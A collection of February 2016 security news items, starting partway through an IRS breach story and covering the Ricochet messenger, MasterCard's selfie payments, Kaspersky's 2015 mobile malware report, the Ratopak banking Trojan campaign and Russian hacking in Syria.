Recently IRS services were abused by crooks to target taxpayers, in May 2015 the Internal Revenue Service was breached by hackers that “used an online service provided by the agency” to access data for more than 100,000 taxpayers. The IRS issued an official statement on the incident and specified that the compromised system was “Get Transcript.” The Transcript service could be used by taxpayers to get a transcript online or by mail to view their tax account transactions.
In August 2015, the Internal Revenue Service disclosed a new review of its system, revealing that 334,000 taxpayers (more than three times it initially estimated) may be affected by the hack it announced in May.
A couple of weeks ago the IRS detected roughly unauthorized attempts using 464,000 unique SSNs, and 101,000 attempts allowed crooks in generating PINs.
The U.S. Internal Revenue Service confirmed that cyber criminals abused the Electronic Filing PIN application running on irs.gov that allows taxpayers to generate a PIN that they can use to file tax returns online.
Ricochet — Most Secure Peer-to-Peer Encrypted Messenger that Sends No Metadata
23.2.2016 Safety
There are several encrypted messaging apps for mobile and desktop platforms that shipped with "The Most Secure" tagline but ends up in de-anonymizing the real identity of its users in some or the other way.
In fact, very few encrypted messaging apps available today deal with the core problem of Metadata.
The majority of apps offer end-to-end encryption that kept the content of your messages away from prying eyes, but your metadata will still be accessible to them, which is enough to know who you really are, and who you're talking to.
But, one messenger app stands out of the crowd by providing superb anonymity to its users, and it is dubbed as "Ricochet."
Ricochet is a peer-to-peer instant messaging system available for Windows, Mac, and Linux and you can trust it as the app has already cleared its first professional security audit carried out by cyber security company NCC Group.
What's so Promising about Ricochet?
Ricochet — Most Secure Peer-to-Peer Encrypted Messenger that Sends No Metadata
Unlike other encrypted messaging clients, Ricochet makes use of TOR hidden services in an effort to maintain its users’ anonymity.
With the help of hidden services, a user's traffic never leaves The Onion Router (TOR) network, which makes it much harder for prying eyes or any attacker to see where the traffic is going or coming from.
Peer-to-Peer Connection: No Servers! No Operators!
Ricochet does not trust anyone in maintaining the privacy of its users; thus, the developers have implemented their app with no server or operator support that could be compromised exposing your personal details.
"The concept with Ricochet is: how can we do messaging without any server in the middle—without trusting anything to forward your messages to your contacts" John Brooks (Ricochet program's maintainer) stated.
"That turns out to be exactly one of the problems that hidden services can solve: to contact someone, without anybody in the middle knowing who you are or who you're contacting."
Here's How Ricochet Works
Ricochet supports cross-platform and is very easy to use even for non-technical users.
Your Username: A Unique .Onion Address
tor-network
Every Ricochet client hosts a Tor hidden service, and once you sign up for Ricochet, that is actually your Ricochet ID: a unique .onion address.
Only the one with this .onion address can contact you and send messages, which means the contacts connect to you through Tor and not through any intermediate server, making it extremely harder for anyone to know your real identity from your address.
Ricochet Creates Huge Spike in Hidden Addresses
tor-onion-network
Security researcher Alan Woodward has noticed an unprecedented spike in the number of unique .onion hidden addresses on the Tor network in month of February.
The Statistics shared by the Tor project shows that the number of unique .onion sites has increased by more than 25,000 within 2-3 days.
Researcher believed that this sudden rise could be due to the popularity of Ricochet that creates unique .onion address for every registered user.
Your Messages: End-to-End Encrypted By Default
Besides this, Ricochet also encrypts the contents of your messages by default.
So, to start chatting with someone over Ricochet, you should first know his/her unique Ricochet ID that is being auto-generated at the time of the Ricochet Installation.
Moreover, once the connection is terminated by either the sender or the receiver, the remaining one would not be able to communicate or send messages to the other.
Ricochet Takes Your Security Seriously
The audit by NCC Group discovered a security flaw that could be exploited to deanonymize users, but the good news is that the issue has been resolved in the latest release, Ricochet 1.1.2.
The security vulnerability was independently discovered by a member of the Ricochet community.
Ricochet has been around since 2014 and is now far secured than any other existing encrypted messaging apps. But the app is still in the dogfooding stage, as Brooks referred to the "Be Careful" statement on the project's official website:
"Ricochet is an experiment. Security and anonymity are difficult topics, and you should carefully evaluate your risks and exposure with any software."
Download Now!
Brooks has already made the option to report the vulnerabilities publicly.
Currently, the app runs on the desktop platform including Windows, Mac, and Linux, and we could expect the mobile version of the app in coming future.
You can download Ricochet for your desktop here.
As for now, Brooks is looking to get funding from open source community for the further development of Ricochet itself, such as implementing a file-sharing feature.
Pay-by-Selfie – MasterCard is replacing the customer password with his selfie
23.2.2016 Security
MasterCard announced the extension of the ‘pay-by-selfie’ facial recognition technology to 14 countries this summer, this means no more passwords.
The giant multinational financial services corporation MasterCard announced the extension of the ‘pay-by-selfie’ facial recognition technology to 14 countries this summer. In October Mastercard announced the creation of a new payment method based on the Identity Check App which lets users complete financial transactions by using their face.
Mastercard wants to increase the security with biometric technology and improve the user experience making easy to authenticate users for ordinary operations like payments.
“As the world gets increasingly digital, this will be the next wave of technology that will change the consumer experience of shopping digitally,” Ajay Bhalla, president of enterprise security solutions for MasterCard told to USAToday. “It’s all part of our role in making commerce available anywhere, any time, on any digital device.”
Pay-by-Selfie
Pay-by-Selfie – Mastercard
How does it work?
The pay-by-selfie’ facial recognition technology is simple to use, a customer only needs to download the Identity Check app. When a merchant requires identifying the user before purchase, the customer will get a push notification to his mobile device which triggers the mobile app. At this point, it is enough to take a selfie to authorize the purchase.
Mastercard conducted tests in several countries before the introduction of the technology, and now it considers it as a mature technology to be introduced in strategic market like the British one.
The technology will drastically reduce the risk of identity fraud because it will be harder for hackers to take a victim’s pictures without the users’ interaction. Data provided by Get Safe Online, revealed that the top 10 internet fraud campaigns between September 2014 and August 2015 cost the UK over £268 million.
The company is proud to have reduced the attack surface if the customers don’t rely on the user inputting passwords that could be easily phished by fraudsters.
I had no opportunity to test the technology, but the first attack scenario that I have in mind is the infection of a mobile device that is able to steal a customer selfie end submit it in stealth way when a transaction must be authorized. A similar malware needs to have access to the camera, the local storage, the applications and needs the ability to intercept the push notifications.
Mastercard is investing in the biometric authentication, including iris and voice recognition technologies, most advanced studies are pushing the use of heartbeat via a connected bracelet device.
According to Fortune, other banks are introducing biometric technology to improve security of their customers, HSBC is working on the voice recognition and touch identification, meanwhile Barclays introduced voice recognition to its private banking division in 2013.
Mobile malware evolution 2015
23.2.2016 Zdroj: Kaspersky Mobil Virus
The year in figures
In 2015, Kaspersky Lab detected the following:
2,961,727 malicious installation packages
884,774 new malicious mobile programs – a threefold increase from the previous year
7,030 mobile banking Trojans
Trends of the year
Rise in the number of malicious attachments the user is unable to delete.
Cybercriminals actively using phishing windows to conceal legitimate apps.
Growth in the volume of ransomware.
Programs using super-user rights to display aggressive advertising.
Increase in the quantity of malware for iOS.
Main methods of monetization
Mobile malware continues to evolve towards monetization, with malware authors trying to ensure their creations are capable of making money from their victims.
Stealing money from user bank accounts
Mobile Trojans targeting user bank accounts continue to develop – in 2015, we detected 7,030 new mobile banking Trojans. Some malicious mobile programs work in combination with Windows-based Trojans to capture mTAN passwords (one-time passwords used in two-factor authentication) that are used for authorizing bank transactions. Many of the other mobile programs used to steal money from user bank accounts operate independently.
Some mobile malware is capable of overlaying the on-screen display of a legitimate banking app with that of a phishing window that imitates the app. The most notable examples of this type of program are Trojan Trojan-SMS.AndroidOS.OpFake.cc and the representatives of the Trojan-Banker.AndroidOS.Acecard family. One of the OpFake.cc modifications can imitate the interface of more than 100 legitimate banking and finance apps. The Acecard family can imitate at least 30 banking apps and also has functionality to overlay any app that the C&C server commands.
In Q2 2015, we wrote about Trojan-Spy.AndroidOS.SmsThief.fc whose malicious code was embedded in a legitimate banking app without affecting its performance. This meant it was highly unlikely a user would notice the malware.
The authors of mobile malware are taking an increasingly integrated approach to stealing money: it is no longer limited to special banking Trojans targeting banking apps.
An example of this approach is Trojan-SMS.AndroidOS.FakeInst.ep. What the users see is a message, purportedly from Google, demanding that they open Google Wallet and go through an ‘identification’ procedure that involves entering their credit card details (one of the reasons given is the need to combat cybercrime). The window cannot be removed until the victim enters their credit card details.
Once users enter the required data, it is sent to attackers, and the window closes. Meanwhile, the Trojan continues to steal information and send additional information to its owners about the smartphone and its user.
Against a background of slowing growth in the number of specialized banking Trojans, the total number of apps that can steal money from users is growing. This comes at a time when banking Trojans are becoming more sophisticated and versatile – they are often capable of attacking customers of dozens of banks located in a variety of countries. This means cybercriminals do not need lots of different files to attack the customers of different banks.
Ransomware
The amount of Trojan-Ransom families doubled in 2015 compared to the previous year, while the number of detected modifications increased 3.5 times. This means some criminals are switching to ransomware to steal money, and those who were already doing so are continuing to create new versions of the malware. Yet another key indicator confirming the importance of this class of threat is the number of people who were attacked: in 2015, this figure increased fivefold.
In most cases when these Trojans block a device, the user is accused of committing some alleged misdemeanor, and has to pay to unblock the device – the ransom can range from $12 to $100. The blocked device is rendered inoperable – the user only sees a window with the ransom demand. Some Trojans are capable of overlaying system dialog boxes, including those used to switch off the phone.
The window opened by Fusob
At the end of the year we detected several Trojan downloaders that downloaded Trojan-Ransom.AndroidOS.Pletor in the system. These Trojan downloaders exploit vulnerabilities in the system to gain super-user privileges on the device and install Trojan-Ransom malware in the system folder. Once installed, this Trojan is almost impossible to remove.
SMS Trojans remained a serious threat, particularly in Russia. These programs send paid text messages from an infected device without the user being aware. Although their share in the overall flow of mobile threats continues to decline, the number of SMS Trojans in absolute terms remains substantial.
Some SMS Trojans are not limited to the sending of text messages to premium numbers; they can also connect the user to paid subscriptions. In 2015, we kept track of how Trojan-SMS.AndroidOS.Podec – still one of the most popular Trojans among cybercriminals – was developing. This Trojan boasts an unusual feature: its main method of monetization is paid subscriptions. It is capable of bypassing Captcha, and its latest modifications have “lost” the ability to send text messages as its creators have focused on subscriptions.
Aggressive advertising
In 2015, we recorded an increase in the number of programs that use advertising as the main means of monetization. The trend of the year was Trojans using super-user privileges. In the first quarter of 2015, the mobile malware TOP 20 contained just one Trojan of this type; by the end of the year they made up more than half of the rating. Despite the fact that these Trojans are designed to download and install advertising applications without the user’s knowledge, they can cause a lot of problems. Once installed, they try to root the device and install their own components in the system making them difficult to remove. Some of them remain on a smartphone even after resetting to factory settings. As a result, the user is inundated with annoying ads on the device. They can also install lots of other programs, including malware, on the device without the user being aware. There have been cases of this type of program being distributed in the official firmware of devices or being pre-installed on new phones.
Malware in official stores
In early October 2015 we came across several Trojans in the official Google Play Store that stole user passwords from the Russian social network VKontakte. These were Trojan-PSW.AndroidOS.MyVk.a and Trojan-PSW.AndroidOS.Vkezo.a. About a month later we detected a new modification of the Trojan Vkezo which was also distributed via Google Play Store. The attackers published these Trojans 10 times in the official app store under different names over a period of several months. The number of downloads for all versions of these Trojans was put at between 100 000 and 500 000. Yet another Trojan detected in Google Play Store was Trojan-Downloader.AndroidOS.Leech; it was also downloaded between 100 000 and 500 000 times.
Malware for iOS
In 2015, the number of malicious programs for iOS increased 2.1 times compared to 2014.
The recent emergence of malicious apps in the App Store once again demonstrated that, contrary to popular belief, iOS is not invulnerable to malware. The attackers did not hack App Store, but instead posted a malicious version of Apple’s Xcode, a free set of tools that developers use to create applications for iOS, on the Internet.
Apple’s Xcode is officially distributed by Apple, but it is unofficially spread by third parties. Some Chinese vendors prefer to download the development tools from local servers. Someone posted an Xcode version containing malicious XcodeGhost on a third-party server in China. Malicious code is embedded in any application compiled using this version of Xcode.
XcodeGhost infected dozens of applications. Initially it was thought that 39 infected apps had bypassed the Apple testing procedure and had been successfully downloaded to the App Store. The most popular of them was WeChat, a free messenger installed on more than 700 million user devices. Apple removed the infected apps. However, the hacked version of Xcode was available for about six months, so the total number of infected applications might be much higher, not least because the source code for XcodeGhost was published on Github.
In early June, Trojan.IphoneOS.FakeTimer.a, a malicious program for iPhone, was detected. The Trojan targets users in Japan and can be installed on any iPhone because the attackers used an enterprise certificate to sign the Trojan. The malicious program uses phishing techniques to steal money. A similar version of the Trojan for Android – Trojan.AndroidOS.FakeTimer.a.that – has already been around for several years.
Statistics
In 2015, the volume of mobile malware continued to grow. From 2004 to 2013 we detected nearly 200,000 samples of malicious mobile code. In 2014 there were 295,539 new programs, while the number was 884,774 in 2015. These figures do not tell the whole story because each malware sample has several installation packages: in 2015, we detected 2,961,727 malicious installation packages.
From the beginning of January till the end of December 2015, Kaspersky Lab registered nearly 17 million attacks by malicious mobile software and protected 2,634,967 unique users of Android-based devices.
The number of attacks blocked by Kaspersky Lab solutions, 2015
The number of users protected by Kaspersky Lab solutions, 2015
Geography of mobile threats
Attacks by malicious mobile software were recorded in more than 200 countries.
The geography of mobile threats by number of attacked users, 2015
The number of recorded attacks greatly depends on the number of users in a country. To evaluate the danger of infection by mobile malware in various countries we calculated the percentage of our users who encountered malicious applications in 2015.
TOP 10 countries by the percentage of attacked users
Country % of attacked users*
1 China 37
2 Nigeria 37
3 Syria 26
4 Malaysia 24
5 Ivory Coast 23
6 Vietnam 22
7 Iran 21
8 Russia 21
9 Indonesia 19
10 Ukraine 19
* We excluded those countries in which the number of users of Kaspersky Lab mobile security products over the reported period was less than 25,000.
** The percentage of attacked unique users as a percentage of all users of Kaspersky Lab mobile security products in the country
China and Nigeria topped the ranking, with 37% of users of Kaspersky Lab mobile security products in those countries encountering a mobile threat at least once during the year. Most of the attacks on users in Nigeria were carried out by advertising Trojans such as the Ztrorg, Leech, and Rootnik families that make use of super-user privileges, as well as by adware.
In China, a significant proportion of the attacks also involved advertising Trojans, but the majority of users encountered the RiskTool.AndroidOS.SMSreg family. Careless use of these programs can lead to money being withdrawn from a mobile account.
Types of mobile malware
Over the reporting period, the number of new AdWare and RiskTool files detected grew significantly. As a result, their share in the distribution of new mobile malware by type also increased noticeably – from 19.6% and 18.4% to 41.4% and 27.4%, respectively.
Distribution of new mobile malware by type in 2014 and 2015
When distributing adware programs, rather primitive methods are used to attract the attention of users to the advertisements: apps are created using the icons and names of popular games or useful programs. Of course, there are lots of popular games and legitimate applications, so a lot of fake advertising apps can be generated. The more fake applications that are used, the more effective the monetization of click activity is. Yet another way of distributing adware is by embedding an advertising module in a legitimate application. This can be done by the author of the application as well as by those who want to make money by exploiting an app’s popularity: when the advertising module is embedded in a clean app without the author’s knowledge, the profits from advertising go to those who added the advert, not the author. Unlike fake apps, this complex app contains some useful functionality.
The growth in the volume of adware is caused by the increasing competition among developers of these programs. The legitimate programs that use various advertising modules are often too aggressive. Increasingly, advertising modules are delivering as much advertising as possible to the user in a variety of ways, including the installation of new adware programs. Sometimes the adware programs installed on a device can make it almost impossible to use because the user is constantly fighting with advertising windows.
RiskTool programs are especially popular in China. This is because SMS payments for content are very popular in the country. Almost any game that includes so-called internal purchases (for additional levels of a game, for example) contains an SMS payment module. In most cases, the user is notified about the potential risks associated with such purchases, but we also consider it necessary to inform our users about the risks. Because the games in question are popular, the number of RiskTool applications is constantly increasing. The main contributor to that growth was the RiskTool.AndroidOS.SMSReg family of programs.
Although AdWare and RiskTool programs do not cause direct harm to users, they can be very irritating, while RiskTool programs installed on mobile devices can lead to financial losses if used carelessly or manipulated by a cybercriminal.
The proportion of SMS Trojans in the overall flow of mobile threats decreased almost 2.4 times – from 20.5% to 8.7%. However, in 2015 we detected even more new SMS Trojans than in 2014. Activity by this type of malicious program dropped drastically in mid-2014. This was the result of an AoC (Advice-of-Charge) system being introduced by Russian operators that led to a reduction in the number of so-called affiliate programs distributing SMS Trojans, the majority of which targeted users in Russia.
Top 20 malicious mobile programs
Please note that the ranking of malicious programs below does not include potentially unwanted programs such as RiskTool or AdWare.
Name % of all attacked users*
1 DangerousObject.Multi.Generic 44.2
2 Trojan-SMS.AndroidOS.Podec.a 11.2
3 Trojan-Downloader.AndroidOS.Leech.a 8.0
4 Trojan.AndroidOS.Ztorg.a 7.6
5 Trojan.AndroidOS.Rootnik.d 6.9
6 Exploit.AndroidOS.Lotoor.be 6.1
7 Trojan-SMS.AndroidOS.OpFake.a 5.6
8 Trojan-Spy.AndroidOS.Agent.el 4.0
9 Trojan.AndroidOS.Guerrilla.a 3.7
10 Trojan.AndroidOS.Mobtes.b 3.6
11 Trojan-Dropper.AndroidOS.Gorpo.a 3.6
12 Trojan.AndroidOS.Rootnik.a 3.5
13 Trojan.AndroidOS.Fadeb.a 3.2
14 Trojan.AndroidOS.Ztorg.pac 2.8
15 Backdoor.AndroidOS.Obad.f 2.7
16 Backdoor.AndroidOS.Ztorg.c 2.2
17 Exploit.AndroidOS.Lotoor.a 2.2
18 Backdoor.AndroidOS.Ztorg.a 2.0
19 Trojan-Ransom.AndroidOS.Small.o 1.9
20 Trojan.AndroidOS.Guerrilla.b 1.8
* Percentage of users attacked by the malware in question, relative to all users attacked
First place is occupied by DangerousObject.Multi.Generic (44.2%), used in malicious programs detected by cloud technologies. Cloud technologies work when the antivirus database contains neither the signatures nor heuristics to detect a malicious program, but the cloud of the antivirus company already contains information about the object. This is basically how the very latest malware is detected.
Trojan-SMS.AndroidOS.Stealer.a, which was the TOP 20 leader in 2014, came 28th in 2015.
Four places in the TOP 20 are occupied by Trojans that steal money from mobile or bank accounts as their main method of monetization. They are Trojan-SMS.AndroidOS.Podec.a, Trojan-SMS.AndroidOS.OpFake.a, Trojan.AndroidOS.Mobtes.b and Backdoor.AndroidOS.Obad.f. Trojan-SMS.AndroidOS.Podec.a (11.2%) is in second place. This Trojan remained among the top three most popular mobile threats throughout 2015. To recap, the latest versions of this Trojan no longer send paid text messages. The Trojan is now fully focused on paid subscriptions, making use of CAPTCHA recognition. Trojan-SMS.AndroidOS.OpFake.a (5.6%) in 7th place is another long-term resident of the TOP 20. In 2014 it finished in 8th place and remained in the rating throughout all of 2015.
Yet another Trojan – Trojan-Ransom.AndroidOS.Small.o (1.9%) – blocks the victim’s phone and extorts money to unblock it. This mobile Trojan-Ransom program was very popular at the end of 2015 and became the only ransomware program to make the TOP 20. It first appeared in the ranking in the third quarter of 2015 in 11th place; it came 19th in the overall TOP 20 for 2015. The Trojan mostly spreads as a porn video player and targets Russian-speaking audiences.
More than half (12 out of 20) of the entries in the ranking are Trojans that use aggressive advertising as their primary means of monetization. They are Trojan-Downloader.AndroidOS.Leech.a, Trojan-Spy.AndroidOS.Agent.el, Trojan-Dropper.AndroidOS.Gorpo.a, Trojan.AndroidOS.Fadeb.a, and two modifications each of Trojan.AndroidOS.Guerrilla, Trojan.AndroidOS.Rootnik, Trojan.AndroidOS.Ztorg and Backdoor.AndroidOS.Ztorg. Unlike the usual advertising modules, these programs do not contain any useful functionality. Their goal is to deliver as many adverts as possible to the recipient using a variety of methods, including the installation of new advertising programs. These Trojans can use super-user privileges to conceal their presence in the system folder, from where it will be very difficult to dislodge them. We have come across such Trojans before, mostly in China. There was a burst of activity by these programs in 2015: most of them targeting users in China, although these Trojans have started being actively distributed worldwide. The code of the Trojans often contained the word oversea.
The other two places in the TOP 20 are occupied by Exploit.AndroidOS.Lotoor modifications used to obtain local super-user privileges.
Mobile banking Trojans
In 2015, we detected 7,030 mobile banking Trojans, which is 2.6 times less than in 2014 when 16,586 were detected. It should be noted that although the number of new malware programs fell from the previous year, these programs have become more adept and malign, and the areas of interest among cybercriminals now includes banks in numerous countries. Many mobile banking Trojans act independently, without any computer component, and target customers of dozens of banks around the world.
Number of mobile banking Trojans detected by Kaspersky Lab solutions in 2015
56,194 users were attacked by mobile banking Trojans at least once during the year.
Geography of mobile bankers
The number of attacked countries is growing: attacks by mobile banking Trojan were registered in 137 countries and territories worldwide vs 90 countries in 2014.
Geography of mobile banking threats in 2015 (number of users attacked)
Top 10 countries attacked by mobile banking Trojans (ranked by number of users attacked):
Country Number of users attacked
1 Russia 45690
2 Germany 1532
3 Ukraine 1206
4 US 967
5 Kazakhstan 804
6 Australia 614
7 South Korea 527
8 France 404
9 Belarus 380
10 Poland 324
As in the previous year, Russia topped the rating of countries attacked by mobile banking Trojans. Among the newcomers were South Korea, Australia, France and Poland. Lithuania, Azerbaijan, Bulgaria and Uzbekistan left the TOP 10.
Just how popular mobile banking Trojans are with cybercriminals in each country can be shown by the percentage of users who were attacked by these Trojans during the reporting period, relative to all attacked users.
TOP 10 countries by the percentage of users attacked by mobile banking Trojans relative to all attacked users
Country % of all attacked users*
1 South Korea 13.8
2 Australia 8.9
3 Russia 5.1
4 Austria 3.0
5 Belarus 1.9
6 US 1.8
7 Tajikistan 1.7
8 Ukraine 1.6
9 France 1.6
10 Uzbekistan 1.6
* Percentage of users attacked by mobile banking Trojans, relative to all attacked users of Kaspersky Lab’s mobile security products in the country.
A substantial portion of mobile banking attacks in South Korea were caused by representatives of the Trojan-Banker.AndroidOS.Wroba family. These Trojans are designed to steal mobile bank accounts of the largest Korean banks as well as mTans.
In Australia, the Trojan-Banker.AndroidOS.Acecard family was responsible for most infection attempts. This family is a new stage in the evolution of Backdoor.AndroidOS.Torec.a, the first Trojan for Android that made use of Tor. We detected this Trojan at the beginning of 2014, while the first banking modifications appeared in mid-2014. At that time the Trojan was distributed mainly in Russia, and only in 2015 did it begin to spread actively in Australia. One modification, which we detected in November 2015, is able to overlay the interfaces of 24 banking apps with a phishing window. Five of those apps belong to Australian banks, another four each belong to banks based in Hong Kong, Austria and New Zealand, three each to banks in Germany and Singapore, plus the PayPal app. In addition, there are modifications which target banks in the US and Russia.
Phishing windows of the Acecard Trojan
Stealing user logins and passwords by displaying a phishing window instead of the genuine app interface is not a new trick. We first came across it back in 2013 in Trojan-SMS.AndroidOS.Svpeng. In our IT threat evolution in Q1 2015 report we mentioned Trojan-SMS.AndroidOS.OpFake.cc which was capable of attacking at least 29 banking and financial apps. The latest modification of this Trojan can now attack 114 banking and financial apps. Its main goal is to steal the login credentials for bank accounts. It also overlays the windows of several popular mail applications.
In Russia, which ranked third in the TOP 10, Trojan-Banker.AndroidOS.Faketoken and Trojan-Banker.AndroidOS.Marcher were the most popular programs used by attackers. Starting in April, we saw a sharp drop in the number of attempts to infect users with representatives of the Trojan-Banker.AndroidOS.Marcher family. During the five months from April to August, the number of attacks using this Trojan decreased fivefold. It is possible that the cybercriminals were preparing attacks on users in other countries during that time, because until September 2015 activity by this family was limited almost exclusively to Russia. From September, however, about 30% of the attacks using this Trojan targeted users in Australia, Germany and France.
The aforementioned Trojan-Spy.AndroidOS.SmsThief.fc was distributed in Russia. The attackers added their code to the original banking app without affecting its performance, making this Trojan more difficult to detect.
Mobile Trojan-Ransom
In 2015, the amount of the Trojan-Ransom families doubled compared to 2014. The number of modifications detected during the same period increased 3.5 times and accounted for 6,924.
Over the reporting period, mobile ransomware attacked 94,344 unique users which is five times more than in 2014 (18,478). The share of unique users attacked by Trojan-Ransom programs relative to all users attacked by mobile malware increased from 1.1% to 3.8% during the year.
Mobile ransomware attacks were registered in 156 countries and territories at least once during the year.
Geography of mobile ransomware threats in 2015 (number of users attacked)
TOP 10 countries attacked by Trojan-Ransom malware by the number of attacked users:
Country Number of attacked users
1 Russia 44951
2 Germany 15950
3 Kazakhstan 8374
4 US 5371
5 Ukraine 4250
6 UK 2878
7 Italy 1313
8 Spain 1062
9 Iran 866
10 India 757
Russia, Germany and Kazakhstan were the countries attacked most often by ransomware.
In Russia and Kazakhstan, the Trojan-Ransom.AndroidOS.Small family was most active, in particular the modification Trojan-Ransom.AndroidOS.Small.o, the most popular Trojan-Ransom program in 2015.
The Trojan-Ransom.AndroidOS.Pletor family also remained very popular in 2015. Interestingly, this first mobile encryptor Trojan was developed by the same group of cybercriminals as Trojan-Banker.AndroidOS.Acecard.
In Germany, Trojan-Ransom.AndroidOS.Fusob was the most actively distributed family.
Windows opened by the Fusob Trojan
The US came fourth in the ranking. The Trojan-Ransom.AndroidOS.Fusob family was especially popular in the country, although the Trojan-Ransom.AndroidOS.Svpeng family was also actively used.
This ranking depends to a large extent on the number of users in each country, so it is interesting to view a rating that shows the proportion of users attacked by Trojan-Ransom malware relative to all attacked users in the country.
TOP 10 countries attacked by Trojan-Ransom malware – share of users relative to all attacked users in the country.
Country % of all attacked users*
1 Kazakhstan 15.1
2 Germany 14.5
3 US 10.3
4 Canada 8.9
5 Netherlands 8.8
6 UK 8.3
7 Switzerland 6.9
8 Austria 6.4
9 Ukraine 5.9
10 Australia 5.5
* Percentage of users attacked by Trojan-Ransom malware, relative to all attacked users of Kaspersky Lab’s mobile security products in the country
Russia, which accounted for the largest number of attacked users, was not in the TOP 10. The leaders of the ranking were Kazakhstan, Germany and the US.
Conclusion
Despite the fact that the first advertising Trojans exploiting super-user privileges for their own purposes appeared a few years ago, in 2015 their number increased substantially and started spreading rapidly. In the first quarter of 2015 the most popular threats included just one Trojan of this type, but by the end of the year these programs accounted for more than half of the TOP 20. They are distributed using all available means – via other advertising programs, via app stores and can be even pre-installed in some devices. The number of advertising Trojans using super-user privileges will most likely continue to grow in 2016.
We have already seen cases when advertising Trojans were used to spread malicious mobile programs. There is every reason to believe that attackers will increasingly use these Trojans to infect mobile devices with malware.
We also came across cases where super-user privileges were utilized by other types of malware, especially ransomware.
Trojan-Ransom malware is likely to continue evolving in 2016. We expect the popularity of these programs among attackers to grow and their global reach to increase.
Another type of Trojan that we intend to continue monitoring closely in 2016 is Trojan-Banker. There are already lots of banking Trojans that do not require additional software on the victim’s computer. These Trojans operate independently, and only need to infect the user’s phone to steal his money. They are able to steal logins and passwords for mobile banking accounts by overlaying the legitimate banking app interfaces with a phishing window. The Trojans can also steal credit card data using phishing windows. In addition, they have functionality to intercept communications between a client and a bank – stealing incoming text messages and forwarding calls to the attacker. In 2016, banking Trojans will attack even more banking institutions and will use new distribution channels and new data theft technologies.
As the functionality of mobile devices and mobile services grows, the appetite of cybercriminals who profit from mobile malware will grow too. Malware authors will continue to improve their creations, develop new technologies and look for new ways of spreading mobile malware. Their main aim is to make money. In these circumstances, neglecting to protect your mobile devices is extremely risky.
Ratopak Trojan – Russian banks under attack
23.2.2016 Virus
Financially-motivated actors have targeted employees of at least six Russian banks into installing the Ratopak Trojan, experts have found evidence of an extended hacking campaign.
According to the Symantec security firm, a cyber criminal gang financially -motivated has targeted employees of Russian banks.
The threat actors have been using a Trojan called Ratopak to gain control over the victim’s machine and exfiltrate data. The experts spotted several attacks since October, the attack chain starts with fake Central Bank employment emails sent to the staff of Russian financial institutions. In the attempt to trick victims, the threat actors behind the malicious campaign have registered that domain cbr.com.ru that is similar to the official domain used by Russia’s Central Bank cbr.ru.
The domain is referenced by the content of the fake emails and it is used by the cyber criminals as a repository for the Ratopak Trojan.
Source Symantec Report
The Ratopak Trojan implements a number of backdoor features, including logging keystrokes and stealing clipboard data.
“Trojan.Ratopak was likely used because it can allow the attacker to gain control of the compromised computer and steal information. The threat can open a back door on the computer and allow the attacker to perform a variety of actions, including logging keystrokes, retrieving clipboard data, and viewing and controlling the screen. It can also be used to download other malicious files and tools. The narrow focus of the attacks and the use of Ratopak could be a hint to what the attackers were after.” states a blog post published by Symantec.
The malware is signed with stolen certificates and the sample analyzed by Symantec were specifically developed to target Russian or Ukrainian users.
“The threat also checks the language of the compromised computer. If it isn’t Russian or Ukrainian, then the malware stops its attack. Ratopak may also terminate and delete itself if it recognizes that it is being run on a virtual machine or a researcher’s computer.” continues the post.
Researchers said many of the infected computers had been running accounting and document management software designed to allow users to securely exchange documents with government organizations for tax purposes.
The malware experts at Symantec noticed that the presence of a software developed by the Russian company SBI running on many of the infected machines. The application developed by SBI is an accounting application and is referred to as “buh.” (“accountant” in Russian language). The threat actors inserted the word buh in the URLs in an effort to avoid deceive victims that normally work with the software developed by the SBI.
“A common link between several of the victims was a piece of software created by SBIS, a Russian company that develops, among other things, accounting and payroll applications. In URLs used by SBIS, their accounting software is referred to as “buh” (buh.sbis.ru/buh/ for example. “Buh” is the Russian term for accountant).” states Symantec “The attackers behind these attacks used “buh” in their URLs, knowing their victims would be running SBIS accounting software. By using this string in their URLs, the attackers can disguise their attack by making their activities look like normal traffic. This approach has led other researchers to label Trojan.Ratopak as “Buhtrap””
In April 2015, experts at ESET spotted a malware campaign dubbed Operation Buhtrap, a conjunction of the Russian word for accountant “Buhgalter” and the English word “trap”. So far Buhtrap has not been seen anywhere else in the wild, so is not likely to be widespread. Approx. 88 per cent of targets were located in Russia and ten per cent in Ukraine. Analysts linked the campaign to the Anunak/Carbanak campaign, which also targeted Russian and Ukrainian Banks.
“Although we believe it to be a different campaign, it shares some similarities with Anunak/Carbanak in terms of techniques, tactics and procedures it use.”
The modus operandi of these particular cybercriminals was associated with targeted attacks rather than cyber fraud, which make this move to financial crime unusual. Their method of delivery is by email using an attached invoice document or s hoax contract.
Experts at Symantec confirmed their suspects about the motivation of the attackers that appear to be one of the Russian criminal rings specialized in attacks against banks and financial institutions.
“While there is no conclusive evidence of the attacker’s goal, the attacks appear to be financially motivated. The specificity of the targets−employees at certain banks using accounting software to send the government tax information−certainly points towards this goal,” states Symantec.
Recently other groups targeted Russian banks, the most popular are the Carbanak and Anunak, reportedly stole $1 billion from 100 banks worldwide. A few weeks ago Kaspersky uncovered the operation of Carbanak 2.0.
The experts at Kaspersky Lab discovered that Carbanak cybergang is back and other groups are adopting similar APT-style techniques to steal money, including the Metel and GCMAN hacking crews.
Russian Nation-state hackers intensify operations in Syria
23.2.2016 Hacking
According to security experts Russian nation-state hackers are behind cyber espionage campaigns against opposition groups and NGOs in Syria.
Russia is behind a cyber espionage campaign against Syrian opposition groups and NGOs, the Kremlin wants to conduct a PSYOP to influence the sentiment of the country on the humanitarian crisis as a diversionary action for its military operations in the area.
The Russian hackers target most active human rights organizations and aid groups in the country, including the Syrian Observatory of Human Rights.
The experts have found many similarities with other operations conducted by Russian nation-state actors that operated for example during the Ukrainian crisis.
Hackers used malware to compromise the targeted organizations and spread disinformation from victims’ official accounts.
Source BBC
Security experts at FireEye have collected evidence of the activity of Russian nation-state hackers against Syrian organizations. Richard Turner, head of Middle East and Europe at FireEye revealed that the hacking activity of Russian entities had been intensifying since the start of the year.
“APT 28 and other Russian groups are now really focusing their attention on the collection of data on Syrian groups, particularly those focused on human rights and the monitoring of Russian military activity,” explained Turner. “It’s a very significant operation.” “Clearly this is to enable them to respond politically . . . to target [the groups] for information warfare and to have an impact on the conflict itself,”
The Financial Times reported the a discussion with two senior intelligence officials, that sustain the involvement of the Russian FSB in the espionage campaign.
“Details of the Syrian campaign were discussed with two senior intelligence officials, one from Europe and one from a country neighbouring Syria. The operation was large in scale and systematic in nature, one of them said, speaking on condition of anonymity, adding that the campaign was directed by the FSB, Russia’s state security agency.” states a blog post on the Financial Times.
